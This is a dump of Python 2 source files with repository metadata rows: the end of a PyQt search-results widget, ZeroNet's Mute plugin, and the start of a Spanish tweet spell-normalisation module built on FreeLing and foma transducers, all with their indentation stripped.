self.results_list.itemClicked.connect(self.result_clicked)
self.verticalLayout.addWidget(self.results_list)
self.setWindowTitle(_translate("search_results_widget", "Search Results", None))
self.search_results_label.setText(_translate("search_results_widget", "Search Results", None))
self.search_query_label.setText(_translate("search_results_widget", "Queried: " + search, None))
self.results_list.setSortingEnabled(False)
##
# Defines action to be taken on item result click.
def result_clicked(self, list_item):
##
# Try to get contract data from item
try:
ric_repr = list_item.data(QtCore.Qt.UserRole).toPyObject()
except:
print 'exception'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
| mit | 6,554,279,241,628,381,000 | 52.918382 | 362 | 0.674003 | false | 3.690438 | false | false | false |
frerepoulet/ZeroNet | plugins/Mute/MutePlugin.py | 2 | 3864 | import time
import json
import os
import re
from Plugin import PluginManager
from Translate import Translate
from Config import config
from util import helper
if os.path.isfile("%s/mutes.json" % config.data_dir):
try:
mutes = json.load(open("%s/mutes.json" % config.data_dir))["mutes"]
except Exception, err:
mutes = {}
else:
open("%s/mutes.json" % config.data_dir, "w").write('{"mutes": {}}')
mutes = {}
if "_" not in locals():
_ = Translate("plugins/Mute/languages/")
@PluginManager.registerTo("UiWebsocket")
class UiWebsocketPlugin(object):
# Search and remove or readd files of an user
def changeDb(self, auth_address, action):
self.log.debug("Mute action %s on user %s" % (action, auth_address))
res = self.site.content_manager.contents.db.execute(
"SELECT * FROM content LEFT JOIN site USING (site_id) WHERE inner_path LIKE :inner_path",
{"inner_path": "%%/%s/%%" % auth_address}
)
for row in res:
site = self.server.sites.get(row["address"])
if not site:
continue
dir_inner_path = helper.getDirname(row["inner_path"])
for file_name in site.storage.walk(dir_inner_path):
if action == "remove":
site.storage.onUpdated(dir_inner_path + file_name, False)
else:
site.storage.onUpdated(dir_inner_path + file_name)
site.onFileDone(dir_inner_path + file_name)
def cbMuteAdd(self, to, auth_address, cert_user_id, reason):
mutes[auth_address] = {"cert_user_id": cert_user_id, "reason": reason, "source": self.site.address, "date_added": time.time()}
self.saveMutes()
self.changeDb(auth_address, "remove")
self.response(to, "ok")
def actionMuteAdd(self, to, auth_address, cert_user_id, reason):
if "ADMIN" in self.getPermissions(to):
self.cbMuteAdd(to, auth_address, cert_user_id, reason)
else:
self.cmd(
"confirm",
[_["Hide all content from <b>%s</b>?"] % cert_user_id, _["Mute"]],
lambda (res): self.cbMuteAdd(to, auth_address, cert_user_id, reason)
)
def cbMuteRemove(self, to, auth_address):
del mutes[auth_address]
self.saveMutes()
self.changeDb(auth_address, "load")
self.response(to, "ok")
def actionMuteRemove(self, to, auth_address):
if "ADMIN" in self.getPermissions(to):
self.cbMuteRemove(to, auth_address)
else:
self.cmd(
"confirm",
[_["Unmute <b>%s</b>?"] % mutes[auth_address]["cert_user_id"], _["Unmute"]],
lambda (res): self.cbMuteRemove(to, auth_address)
)
def actionMuteList(self, to):
if "ADMIN" in self.getPermissions(to):
self.response(to, mutes)
else:
return self.response(to, {"error": "Only ADMIN sites can list mutes"})
def saveMutes(self):
helper.atomicWrite("%s/mutes.json" % config.data_dir, json.dumps({"mutes": mutes}, indent=2, sort_keys=True))
@PluginManager.registerTo("SiteStorage")
class SiteStoragePlugin(object):
def updateDbFile(self, inner_path, file=None, cur=None):
if file is not False: # File deletion always allowed
# Find for bitcoin addresses in file path
matches = re.findall("/(1[A-Za-z0-9]{26,35})/", inner_path)
# Check if any of the adresses are in the mute list
for auth_address in matches:
if auth_address in mutes:
self.log.debug("Mute match: %s, ignoring %s" % (auth_address, inner_path))
return False
return super(SiteStoragePlugin, self).updateDbFile(inner_path, file=file, cur=cur)
| gpl-2.0 | 2,080,761,283,754,991,900 | 37.64 | 134 | 0.587992 | false | 3.551471 | true | false | false |
jacerong/normalesp | normalesp/spell_checking.py | 1 | 55817 | # -*- coding: iso-8859-15 -*-
"""This is the main program of the Python project.
To use this program, please check the document "/docs/usage.rst".
"""
import difflib, multiprocessing, os, re, socket, subprocess, threading,\
xml.etree.ElementTree as ET
import kenlm, numpy as np, psutil, py_common_subseq
from sklearn.grid_search import ParameterGrid
from unidecode import unidecode
from timeout import Timeout
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
###############################
# read the configuration file #
###############################
config = ET.parse(CURRENT_PATH + '/config/general.xml').getroot()
FREELING_PORT = config[0][0].text
FOMA_PATH = config[1][0].text.rstrip('/')
IP_ADDRESS = config[1][1].text
SYSTEM_USER = config[2][0].text
NUM_WORKERS = '%i' % (2 * int(config[2][1].text) + 1)
config = None
##########################
# other config variables #
##########################
TRANSDUCERS_PATH = CURRENT_PATH + '/datasets/transducers/bin'
TRANSDUCERS = {
'es-dicc':
[TRANSDUCERS_PATH + '/es-dicc.bin', IP_ADDRESS, '60962'],
'pnd-gazetteer':
[TRANSDUCERS_PATH + '/PND-Gazetteer.bin', IP_ADDRESS, '60963'],
'primary_variants':
[TRANSDUCERS_PATH + '/primary_variants.bin', IP_ADDRESS, '60964'],
'dictionary_lookup':
[TRANSDUCERS_PATH + '/dictionary_lookup.bin', IP_ADDRESS, '60965'],
'secondary_variants-dicc':
[TRANSDUCERS_PATH + '/secondary_variants-Dicc.bin', IP_ADDRESS, '60966'],
'es-verbal-forms-fonemas':
[TRANSDUCERS_PATH + '/es-verbal-forms-fonemas.bin', IP_ADDRESS, '60967'],
'es-diminutives-fonemas':
[TRANSDUCERS_PATH + '/es-diminutives-fonemas.bin', IP_ADDRESS, '60968'],
'pnd-gazetteer-fonemas':
[TRANSDUCERS_PATH + '/PND-gazetteer-fonemas.bin', IP_ADDRESS, '60969'],
'tertiary_variants-dicc':
[TRANSDUCERS_PATH + '/tertiary_variants-Dicc.bin', IP_ADDRESS, '60970'],
'tertiary_variants-pnd':
[TRANSDUCERS_PATH + '/tertiary_variants-PND.bin', IP_ADDRESS, '60971'],
'pnd-gazetteer-case':
[TRANSDUCERS_PATH + '/PND-gazetteer-CaSe.bin', IP_ADDRESS, '60972'],
'iv-candidates-fonemas':
[TRANSDUCERS_PATH + '/IV-candidates-fonemas.bin', IP_ADDRESS, '60973'],
'split-words':
[TRANSDUCERS_PATH + '/split-words.bin', IP_ADDRESS, '60974'],
'length_normalisation':
[TRANSDUCERS_PATH + '/length_normalisation.bin', IP_ADDRESS, '60982'],
'length_normalisation-2':
[TRANSDUCERS_PATH + '/length_normalisation-2.bin', IP_ADDRESS, '60983'],
'phonology':
[TRANSDUCERS_PATH + '/phonology.bin', IP_ADDRESS, '60984'],
'other-changes':
[TRANSDUCERS_PATH + '/other-changes.bin', IP_ADDRESS, '60985'],
'remove_enclitic':
[TRANSDUCERS_PATH + '/remove_enclitic.bin', IP_ADDRESS, '61002'],
'accentuate_enclitic':
[TRANSDUCERS_PATH + '/accentuate_enclitic.bin', IP_ADDRESS, '61003'],
'remove_mente':
[TRANSDUCERS_PATH + '/remove_mente.bin', IP_ADDRESS, '61004']}
CORPORA = {
'eswiki-corpus-3-grams':
CURRENT_PATH + '/datasets/eswiki/corpora/eswiki-corpus-3-grams.bin'}
####################
# global variables #
####################
ALPHABET = re.compile(u'''[a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1]''', re.I|re.U)
VOWELS_RE = re.compile(u'''[aeiou\xe1\xe9\xed\xf3\xfa\xfc]''', re.I|re.U)
ACCENTED_VOWELS_RE = re.compile(u'''[\xe1\xe9\xed\xf3\xfa]''', re.I|re.U)
ONE_LETTER_WORDS = [u'a', u'e', u'o', u'u', u'y']
TWO_LETTER_WORDS = [u'ah', u'al', u'ay',
u'da', u'de', 'dé'.decode('utf-8'), u'di', 'dí'.decode('utf-8'),
u'eh', u'el', 'él'.decode('utf-8'), u'en', u'es', u'ex',
u'fe',
u'ha', u'he',
u'id', u'ir',
u'ja', u'je', u'ji', u'jo', u'ju',
u'la', u'le', u'lo',
u'me', u'mi', 'mí'.decode('utf-8'),
u'ni', u'no',
u'oh', 'oí'.decode('utf-8'), u'ok', u'os',
u'se', 'sé'.decode('utf-8'), u'si', 'sí'.decode('utf-8'), u'su',
u'te', 'té'.decode('utf-8'), u'ti', u'tu', 'tú'.decode('utf-8'),
u'uf', u'uh', u'un', u'uy',
u'va', u've', 'vé'.decode('utf-8'), u'vi',
u'ya', u'yo']
LOCK = threading.Lock()
def _to_unicode(token):
return token.decode('utf-8') if not isinstance(token, unicode) else token
def _to_str(token):
return token.encode('utf-8') if not isinstance(token, str) else token
def _write_in_file(fname, content, mode='w', makedirs_recursive=True):
dir_ = '/'.join(fname.split('/')[:-1])
if not os.path.isdir(dir_) and makedirs_recursive:
os.makedirs(dir_)
with open(fname, mode) as f:
f.write(content)
def _deaccent(word):
'''Remueve las tildes de la palabra.'''
word = _to_unicode(word)
remove_accents = {
u'\xe1': u'a',
u'\xe9': u'e',
u'\xed': u'i',
u'\xf3': u'o',
u'\xfa': u'u',
u'\xfc': u'u'}
return _to_unicode(''.join([
remove_accents[s] if s in remove_accents.keys() else s
for s in word]))
def _normalize_unknown_symbols(token):
"""Símbolos (letras) no reconocidos los decodifica a ASCII."""
return ''.join([
s if ALPHABET.match(s) else _to_unicode(unidecode(s))
for s in _to_unicode(token)])
def _switch_freeling_server(
mode='on', initialization_command='default', port=FREELING_PORT,
workers=NUM_WORKERS):
'''Inicia/termina el servico de análisis de FreeLing.
paráms:
initialization_command: str | list
especificar la configuración de FreeLing. Por defecto, es la provista
por el TweetNorm 2013.
NOTA: se agrega este parámetro para permitir la inicialización de
FreeLing desde otros archivos.
port: int
cuál puerto se utilizará para ejecutar el servicio de FreeLing.
NOTA: el proceso se inicia y se termina usando el usuario SYSTEM_USER.
'''
pid = None
for process in psutil.process_iter():
cmd_line = process.cmdline()
if (process.username() == SYSTEM_USER and len(cmd_line) > 1
and re.search('analyzer$', cmd_line[0], re.I)
and (cmd_line[-4] == port)):
pid = process.pid
break
if pid is not None and mode == 'off':
psutil.Process(pid=pid).kill()
elif pid is None and mode == 'on':
if (isinstance(initialization_command, str)
and initialization_command == 'default'):
subprocess.Popen(['analyze', '-f', CURRENT_PATH + '/config/es.cfg',
'--flush', '--ftok', CURRENT_PATH + '/config/es-twit-tok.dat',
'--usr', '--fmap', CURRENT_PATH + '/config/es-twit-map.dat',
'--outlv', 'morfo', '--noprob', '--noloc',
'--server', '--port', port, '--workers', workers, '&'])
elif (isinstance(initialization_command, list)
and len(initialization_command) > 0):
subprocess.Popen(initialization_command)
else:
raise Exception('No ha especificado un comando de inicialización válido')
def _analyze_morphologically(text, port=FREELING_PORT):
'''Analiza morfologicamente el texto de un tweet.
Mediante este método se identifican palabras fuera de vocabulario.
NOTA: la configuración de FreeLing para analizar el tweet es dada por la
organización del workshop TweetNorm 2013.
El análisis se realiza haciendo uso del servicio expuesto por FreeLing.
'''
text = _to_str(text)
fname = CURRENT_PATH + '/.tmp/FreeLing-%03d%s%05d' %(
np.random.randint(0, 100),
'-' if np.random.randint(0,2) == 1 else '',
np.random.randint(0, 100000))
_write_in_file(fname + '.txt', text)
subprocess.call(["analyzer_client", port],
stdin=open(fname + '.txt'),
stdout=open(fname + '.morpho', 'w'))
sentences = []
sentence = []
with open(fname + '.morpho') as foutput:
for line in foutput:
line = line.rstrip('\n')
if len(line) == 0:
sentences.append(sentence)
sentence = []
continue
try:
form, lemma, tag = re.split('\s+', line)[:3]
sentence.append([
form.decode('utf-8'), lemma.decode('utf-8'),
tag.decode('utf-8')])
except:
form = line
sentence.append([form.decode('utf-8'), '', ''])
os.remove(fname + '.txt')
os.remove(fname + '.morpho')
return sentences
def _check_flookup_server_status(transducer):
"""Evalúa si el transductor está ejecutándose como servicio.
paráms:
transducer: str
Nombre del transductor. Puede ser la ruta completa
o parte de esta.
Retorna el pid del proceso de flookup que ejecuta como servidor
el transductor.
NOTA: los procesos deben haber sido ejecutados por el usuario SYSTEM_USER.
"""
pid = None
transducer = _to_str(transducer)
for process in psutil.process_iter():
cmd_line = process.cmdline()
if (process.username() == SYSTEM_USER and len(cmd_line) > 1
and re.search('flookup$', cmd_line[0], re.I)
and re.search(transducer + '.bin', _to_str(cmd_line[-2]), re.I)):
pid = process.pid
break
return pid
def _switch_flookup_server(
transducer='all', mode='on', set_of_transducers=TRANSDUCERS):
"""Iniciar o terminar un servicio de transductor como servidor.
paráms:
transducer: str
nombre del transductor definido como clave en el diccionario
set_of_transducers.
Por defecto se asumen todos los transductores.
mode: str
toma dos posibles valores: ON, para iniciar el servidor;
OFF, para terminar el servidor.
set_of_transducers: dict
conjunto de transductores
NOTA: este parámetro se agrega para permitir la ejecución
de transductores que no se especifican en este fichero.
NOTA: los procesos deben ser ejecutados por el usuario SYSTEM_USER.
"""
transducer = _to_str(transducer).lower()
if transducer != 'all' and transducer not in set_of_transducers.keys():
raise Exception('Transductor %s no reconocido' % transducer)
elif mode not in ['on', 'off']:
raise Exception('La acción definida no es válida')
if transducer == 'all':
pool = multiprocessing.Pool(processes=3)
for t in set_of_transducers.keys():
pool.apply_async(
_switch_flookup_server,
[t, mode, set_of_transducers])
pool.close()
pool.join()
return
pid = _check_flookup_server_status(transducer)
transducer = set_of_transducers[transducer]
if mode == 'on':
if pid is None:
subprocess.Popen([FOMA_PATH + '/flookup', '-S',
'-A', transducer[1], '-P', transducer[2],
'-i', '-x', transducer[0], '&'])
else:
if pid is not None:
process = psutil.Process(pid=pid)
process.kill()
def _foma_string_lookup(token, transducer, set_of_transducers=TRANSDUCERS):
'''Analiza el token a través del transductor especificado.
paráms:
token: str
cadena de caracteres a ser analizada.
transducer: str
transductor que analizará el token. Puede ser una ruta completa
o alguna de las claves especificadas en set_of_transducers.
set_of_transducers: dict
conjunto de transductores
NOTA: si el transductor no es una ruta física del sistema, sino una de las
claves del diccionario set_of_transducers, se analizará como servicio de
flookup. Para esto, deberá haberse iniciado con anterioridad el servicio de
flookup.
'''
use_server = False
if transducer.lower() in set_of_transducers.keys():
use_server = True
elif not os.path.isfile(transducer):
raise Exception('El transductor especificado no existe')
token = _to_str(token)
result = []
if not use_server:
fname_input = '%s-%03d%s%05d.txt' % (
CURRENT_PATH + '/.tmp/flookup',
np.random.randint(0, 100),
'-' if np.random.randint(0,2) == 1 else '_',
np.random.randint(0, 100000))
_write_in_file(fname_input, token, mode='w')
fname_output = fname_input.replace('.txt', '.out')
subprocess.call([FOMA_PATH + '/flookup', '-i', '-x', transducer],
stdin=open(fname_input),
stdout=open(fname_output, 'w'))
with open(fname_output) as finput:
for line in finput:
line = line.rstrip('\n')
if len(line.strip()) > 0 and line != '?+':
result.append(_to_unicode(line))
os.remove(fname_input)
os.remove(fname_output)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
transducer = set_of_transducers[transducer.lower()]
sock.sendto(token, (transducer[1], int(transducer[2])))
data, addr = sock.recvfrom(4096)
result = [_to_unicode(d)
for d in data.split('\n')
if len(d.strip()) > 0 and d != '?+']
sock.close()
return result
def _transducers_cascade(token, transducers, set_of_transducers=TRANSDUCERS):
"""Ejecuta una cascada de transductores en foma.
Si bien la cascada puede implementarse directamente sobre foma,
este método se desarrolla porque puede ser más económico ejecu-
tar secuncialmente.
paráms:
token: str o array de str
"""
if isinstance(token, list):
tokens = token
concatenated_result = []
for token in tokens:
concatenated_result += _transducers_cascade(
token, transducers, set_of_transducers)
return concatenated_result
result = []
for i, transducer in enumerate(transducers):
tokens = []
iter_result = []
if i == 0:
tokens.append(token)
else:
tokens = result[i - 1]
iter_result = [t2
for t1 in tokens
for t2 in _foma_string_lookup(t1, transducer, set_of_transducers)
if len(t2.strip()) > 0 and t2 != '?+']
result.append(np.unique(iter_result).tolist())
return result[i]
def _recover_original_word_case_from_type(word, case_type):
"""Recupera las minús./mayús de la palabra según el tipo identificado."""
word = _to_unicode(word).lower()
if case_type == 0:
return word
elif case_type == 1:
return word[0].upper() + word[1:]
else:
return word.upper()
def _get_case_type_in_token(token):
"""Retorna cómo está formada la palabra según mayúsculas/minúsculas.
El valor (entero) retornado es uno de los siguientes:
0 -> palabra completamente en minúscula.
1 -> palabra con la primera letra en mayúscula.
2 -> palabra principalmente (o totalmente) formada por mayúsculas.
"""
token = _to_unicode(token)
case_type = 2
if token.lower() == token:
case_type = 0
elif len(token) > 1 and (token[0].upper() + token[1:].lower()) == token:
case_type = 1
return case_type
def _select_non_fused_words(candidates):
"""Seleccciona el menor número de palabras.
El separador de palabras es el caracter "_".
Es decir, se selecciona el menor número de "_" insertados.
NOTA: si la palabra termina en una letra, se descarta. O
si hay una palabra igual que "ll", también se dercarta.
También, se aceptan candidatas con una palabra más, al mínimo establecido,
si y solo si, esta nueva palabra es de longitud uno.
"""
final_candidates = []
final_candidates_aux = []
idx = np.array([len(c.split('_')) for c in candidates], dtype=int)
lengths = []
for i in np.where(idx <= (idx.min() + 1))[0]:
words = candidates[i].split('_')
words_length = []
ill_formed_word = False
for j, word in enumerate(words):
word = _to_unicode(word)
words_length.append(len(word))
if (word == u'll'
or (j == (len(words) - 1) and len(word) < 2)
or (len(word) == 2 and word not in TWO_LETTER_WORDS)
or (j == 0 and word in [u'e', u'o', u'u'])
or (word == 'e' and words[j+1].lower()[0] != u'i')
or (word == 'o' and words[j+1].lower()[0] == u'o')
or (word == 'u' and words[j+1].lower()[0] != u'o')
or (not VOWELS_RE.search(word) and word != u'y')):
ill_formed_word = True
break
if not ill_formed_word and len(words) == idx.min():
lengths.append(words_length)
final_candidates.append(candidates[i])
elif not ill_formed_word:
final_candidates_aux.append(candidates[i])
for candidate in final_candidates_aux:
words_length = [len(_to_unicode(w)) for w in candidate.split('_')]
ill_formed_word = []
for length in lengths:
j = 0
for l in length:
if l != words_length[j]:
if ((words_length[j]==1 or words_length[j+1]==1)
and (words_length[j]+words_length[j+1])==l):
ill_formed_word.append(0)
else:
ill_formed_word.append(1)
break
j += 1
if (len(ill_formed_word) == len(lengths)
and sum(ill_formed_word) < len(lengths)):
final_candidates.append(candidate)
return final_candidates
def _find_longest_common_substring(string_1, string_2):
"""Encuentra el más largo substring entre dos cadenas.
También devuelve el ratio: longitud del LCSubstring
dividido el string de mayor longitud entre string_1
y string_2.
"""
string_1 = _deaccent(_to_unicode(string_1).lower())
string_2 = _deaccent(_to_unicode(string_2).lower())
max_length = len(string_1)
if len(string_2) > max_length:
max_length = len(string_2)
seq_matcher = difflib.SequenceMatcher(None, string_1, string_2)
longest_match = seq_matcher.find_longest_match(0, len(string_1),
0, len(string_2))
longest_match_str = None
longest_match_ratio = .0
if longest_match.size != 0:
longest_match_str = string_1[longest_match.a:
longest_match.a + longest_match.size]
longest_match_ratio = len(longest_match_str) / float(max_length)
return longest_match_str, longest_match_ratio, longest_match.a, longest_match.b
def _compute_longest_common_subsequence_ratio(
oov_word, iv_word, recursion=False, normalise_lengthening=True):
"""Calcula el radio de LCS entre dos palabras dadas.
El radio de LCS se calcula sobre el string de mayor
longitud entre oov-word e iv-word.
[REF] Lexical Normalisation of Short Text Messages: Makn Sens a #twitter
NOTA: se remueven acentos para no afectar el cómputo de LCSR.
"""
if not recursion:
oov_word = _deaccent(_to_unicode(oov_word).lower())
iv_word = _deaccent(_to_unicode(iv_word).lower())
try:
with Timeout(2):
oov_words = _foma_string_lookup(oov_word, 'other-changes')
except Timeout.Timeout:
oov_words = [oov_word]
_switch_flookup_server('other-changes', mode='on')
LCSR_values = np.zeros(len(oov_words), dtype=float)
for i, string in enumerate(oov_words):
LCSR_values[i] = _compute_longest_common_subsequence_ratio(
string, iv_word, recursion=True,
normalise_lengthening=normalise_lengthening)
return LCSR_values.max()
oov_word = _deaccent(_to_unicode(oov_word).lower())
iv_word = _deaccent(_to_unicode(iv_word).lower())
normalised_variants = [oov_word]
if normalise_lengthening:
normalised_variants = _foma_string_lookup(
oov_word, 'length_normalisation-2')
LCSR = 0.
# normalización a una o dos repeticiones
for normalised_f in normalised_variants:
normalised_f = _to_unicode(normalised_f)
max_length = np.max(
np.array([len(normalised_f), len(iv_word)], dtype=float))
common_subseq = py_common_subseq.find_common_subsequences(
normalised_f, iv_word)
for subseq in common_subseq:
ratio = len(subseq) / max_length
LCSR = ratio if ratio > LCSR else LCSR
return LCSR
def _filter_target_words_by_length(target_words):
"""Filtra candidatas de acuerdo a su longitud.
Exactamente, si la candidata empieza en minúscula, es decir,
es recuperada del diccionario de español, y su longitud es
menor que tres, ésta debe estar en el listado de palabras
de longitud uno o dos aceptadas.
"""
target_words_ = []
for target in target_words:
target = _to_unicode(target)
if len(target) in [1, 2] and target[0] == target[0].lower():
if len(target) == 1 and target in ONE_LETTER_WORDS:
target_words_.append(target)
elif target in TWO_LETTER_WORDS:
target_words_.append(target)
else:
target_words_.append(target)
return target_words_
def _filter_target_words_based_on_LCSR(oov_word, target_words, LCSR):
"""Filtra target words cuyo LCSR está por debajo del umbral requerido."""
remove_idx = []
for i, target in enumerate(target_words):
ratio = _compute_longest_common_subsequence_ratio(
oov_word, target)
if ratio < LCSR:
remove_idx.append(i)
else:
for i in reversed(remove_idx):
target_words.pop(i)
return target_words
def _check_affixes(word, normalised_variants, affix=None, what_affix=None):
'''Extrae prefijos y sufijos comunes.
paráms:
word: str
palabra no normalizada (en cuanto a repetición de caracteres).
normalised_variants: array (de elementos de tipo str)
variantes normalizadas a uno o dos repeticiones como máximo de
caracteres.
affix: str
tipo de búsqueda a realizar.
'suffix' (para sufijo) o 'prefix' (para prefijo)
what_affix: str
se especifica cuál búsqueda realizar de acuerdo al tipo.
'''
if affix is None:
searches = [
['suffix', 'enclitic'],
['suffix', 'mente'],
['suffix', 'diminutives']]
target_words = []
for affix, what_affix in searches:
target_words += _check_affixes(word, normalised_variants,
affix, what_affix)
return np.unique(target_words).tolist()
target_words = []
if affix == 'suffix' and what_affix == 'enclitic':
# identificar cuáles variantes corresponden a una forma
# verbal (candidata) removiendo hipotéticos enclíticos
final_verbal_form = [
'', # forma verbal
.0, # Longest Common Substring ratio
'', # enclítico
False, # si la s de forma verbal fue suprimida (vamos+nos -> vámonos)
]
for verbal_form in _foma_string_lookup(word, 'remove_enclitic'):
if verbal_form not in normalised_variants:
# comparar la forma verbal (candidata) con las variantes
# normalizadas, para así determinar con cuál es más simi-
# lar y cuál el enclítico removido
for normalised_f in normalised_variants:
longest_match = _find_longest_common_substring(
verbal_form, normalised_f)
if (longest_match[1] == .0 or
longest_match[2] != 0 or longest_match[3] != 0):
continue
enclitic = normalised_f[len(longest_match[0]):]
if longest_match[1] > final_verbal_form[1]:
final_verbal_form = [longest_match[0],
longest_match[1], enclitic,
False]
if final_verbal_form[1] != .0:
# realizar la conversión grafema/fonema de la forma verbal
if final_verbal_form[0].endswith('mo'):
final_verbal_form[0] = final_verbal_form[0] + u's'
final_verbal_form[3] = True
verbal_forms_from_fonema = _transducers_cascade(final_verbal_form[0],
['length_normalisation-2',
'phonology',
'es-verbal-forms-fonemas'])
for verbal_form in verbal_forms_from_fonema:
_verbal_form = verbal_form
if final_verbal_form[3]:
verbal_form = verbal_form[:-1]
verbal_form = verbal_form + final_verbal_form[2]
accentuated_forms = np.unique(_foma_string_lookup(verbal_form,
'accentuate_enclitic')).tolist()
# depurar: si hay dos o más tildes en la palabra -> descartar
remove_idx = []
non_accented_form = u''
for i, accentuated_form in enumerate(accentuated_forms):
accented_vowels = ACCENTED_VOWELS_RE.findall(accentuated_form)
if len(accented_vowels) == 1:
target_words.append(accentuated_form)
elif len(accented_vowels) > 1:
remove_idx.append(i)
else:
non_accented_form = accentuated_form
for i in reversed(remove_idx):
accentuated_forms.pop(i)
if (len(target_words) == 0 and not final_verbal_form[3] and
(re.search(u'''[\xe1\xe9\xf3]i''', _verbal_form, re.U)
or re.search(u'''\xed[aeo]''', _verbal_form, re.U))):
target_words.append(_verbal_form + final_verbal_form[2])
else:
target_words.append(verbal_form)
target_words.append(non_accented_form)
elif affix == 'suffix' and what_affix == 'mente':
# realizar búsqueda del sufijo -mente en la palabra,
# e identificar posibles adjetivos
adjectives = []
for adjective in _foma_string_lookup(word, 'remove_mente'):
if adjective not in normalised_variants:
adjectives += _foma_string_lookup(
adjective, 'secondary_variants-dicc')
if len(adjectives) != 0:
longest_match_ratios = np.zeros((len(adjectives), 2))
for i, adjective in enumerate(adjectives):
for normalised_f in normalised_variants:
if not re.search(u'(?:mente)$', normalised_f, re.U):
continue
normalised_f = re.sub(u'(?:mente)$', '',
normalised_f, flags=re.U)
LCSR = _compute_longest_common_subsequence_ratio(
normalised_f, adjective,
recursion=False, normalise_lengthening=False)
if LCSR > longest_match_ratios[i,0]:
longest_match_ratios[i,0] = LCSR
longest_match_ratios[i,1] =\
_find_longest_common_substring(normalised_f, adjective)[1]
idx_i = np.where(
longest_match_ratios[:,0] == longest_match_ratios[:,0].max())[0]
idx_j = np.where(
longest_match_ratios[:,1] == longest_match_ratios[:,1].max())[0]
intersect = np.intersect1d(idx_i, idx_j)
if len(idx_i) == 1 or len(intersect) == 0:
target_words.append(adjectives[idx_i[0]] + u'mente')
else:
target_words.append(adjectives[intersect[0]] + u'mente')
elif affix == 'suffix' and what_affix == 'diminutives':
diminutives = []
for normalised_f in normalised_variants:
normalised_f = _deaccent(normalised_f)
diminutives.append([normalised_f, None])
if normalised_f.endswith(u'z'):
normalised_f = normalised_f[:-1] + u's'
changes = []
if normalised_f.endswith(u's'):
normalised_f = normalised_f[:-1]
diminutives.append([normalised_f, u's'])
changes.append(u's')
elif normalised_f.endswith(u'tin'):
diminutives.append([normalised_f[:-2] + u'o', u'in'])
if re.search(r'i(?:ll|y)[ao]$', normalised_f, re.U):
normalised_f = re.sub(r'i(?:ll|y)([ao])$', r'it\1',
normalised_f, flags=re.U)
changes.append(u'll')
diminutives.append([normalised_f, u'+'.join(changes)])
if normalised_f.endswith(u'a'):
diminutives.append([normalised_f[:-1] + u'o',
u'+'.join(changes + [u'a'])])
elif normalised_f.endswith(u'o'):
diminutives.append([normalised_f[:-1] + u'a',
u'+'.join(changes + [u'o'])])
# realizar transcripción fonética y recuperar diminutivos
diminutive_candidates = diminutives
diminutives = []
for candidate, changes in diminutive_candidates:
real_words = _transducers_cascade(candidate,
['phonology', 'es-diminutives-fonemas'])
for result in real_words:
if changes is None:
diminutives.append(result)
continue
elif changes == u'in':
diminutives.append(result[:-1] + 'ín'.decode('utf-8'))
continue
for change in reversed(changes.split(u'+')):
if change == u's':
result = result + u's'
elif change == u'll':
result = re.sub(r'it([ao])', r'ill\1',
result, flags=re.U)
elif change in [u'a', u'o']:
result = result[:-1] + change
else:
diminutives.append(result)
diminutives = np.unique(diminutives).tolist()
if len(diminutives) == 1:
target_words.append(diminutives[0])
elif len(diminutives) > 1:
longest_match_ratios = np.zeros(len(diminutives))
for i, diminutive in enumerate(diminutives):
longest_match_ratios[i] =\
_compute_longest_common_subsequence_ratio(
word, diminutive, False, True)
target_words.append(diminutives[longest_match_ratios.argmax()])
return np.unique(target_words).tolist()
def _filter_out_acronyms(variants, target_words, max_length):
'''Filtra palabras objetivo identificadas como acrónimos.
Un acrónimo es definido como una palabra compuesta de sólo
consonantes (es decir, sin vocales).
NOTA: esta definición es parcial.
Así, descarta acrónimos que no coinciden con alguna de las
variantes normalizadas (a una y dos repeticiones) de la pa-
labra objetivo.
'''
remove_idx = []
for i, target in enumerate(target_words):
target = _to_unicode(target)
if (max_length < 5
and (target == target.upper() or not VOWELS_RE.search(target))
and target.lower() not in variants):
remove_idx.append(i)
for i in reversed(remove_idx):
target_words.pop(i)
return target_words
def _are_target_words_only_acronyms(target_words):
"""Determina si las palabras sugeridas sólo consisten de acrónimos.
Es un acrónimo aun si está en minúscula, pero no tiene vocal.
"""
validation = True
for target in target_words:
target = _to_unicode(target)
if target.upper() != target and VOWELS_RE.search(target[1:]):
validation = False
break
return validation
def _are_target_words_only_proper_nouns(target_words):
"""Evalúa si las palabras sugeridas son sólo PNDs.
Aun si está en minúscula y no tiene vocal, se considera una variante
de acrónimo, y por lo tanto PND.
"""
validation = True
for target in target_words:
target = _to_unicode(target)
if target.lower() == target and VOWELS_RE.search(target):
validation = False
break
return validation
def _suggest_target_words(word, case_type, external_dicc=None):
"""Sugiere variantes aceptadas (in-vocabulary) de acuerdo al token dado.
Las variantes se producen en cascada; así, si no se generan candidatas en un
nivel, se busca en el siguiente. Si ningún nivel produce variantes, la pala-
bra misma es devuelta.
paráms:
word: unicode
Palabra que (probablemente) está fuera del vocabulario.
Debe estar en minúscula y los caracteres por fuera del alfabeto, nor-
malizados a su representación en ASCII.
case_type: int
Cómo, en mayúsculas/minúsculas, está formada la OOV originalmente.
external_dicc: dict
Diccionario de normalización dependiente de contexto, es decir, ex-
terno. (Véase la explicación [1] en el método `__init__´ de la clase
`SpellTweet´).
"""
# variantes normalizadas a una o dos repeticiones de la palabra
min_length, max_length = 0, 0
normalised_variants = []
for normalised_f in _foma_string_lookup(word, 'length_normalisation-2'):
normalised_f = _deaccent(_to_unicode(normalised_f).lower())
if min_length == 0 or len(normalised_f) < min_length:
min_length = len(normalised_f)
if len(normalised_f) > max_length:
max_length = len(normalised_f)
if normalised_f not in normalised_variants:
normalised_variants.append(normalised_f)
normalised_variants = np.unique(normalised_variants).tolist()
target_words = []
# candidatas siendo la misma OOV.
# Se tiene en cuenta como estaba escrita originalmente.
oov_candidates = [word]
if case_type != 0:
oov_candidates.append(
_recover_original_word_case_from_type(word, case_type))
# 1. Generación de variantes primarias:
# (Pre:) Normalización de repetición de caracteres.
# Estas variantes son "marcadas" con alguno de los siguientes sufijos:
# _LAUGH: interjección de risa (por ej.: ja, je, ..., ju).
# Note que esta es una variación, y por lo tanto, se provee
# la correspondiente normalización.
# _EMO: emoticón.
# Note que esta no es una variación; se trata de un NoEs (no espa-
# ñol) y por lo tanto se devuelve la forma misma.
# _NORM: variante encontrada en el diccionario de normalización.
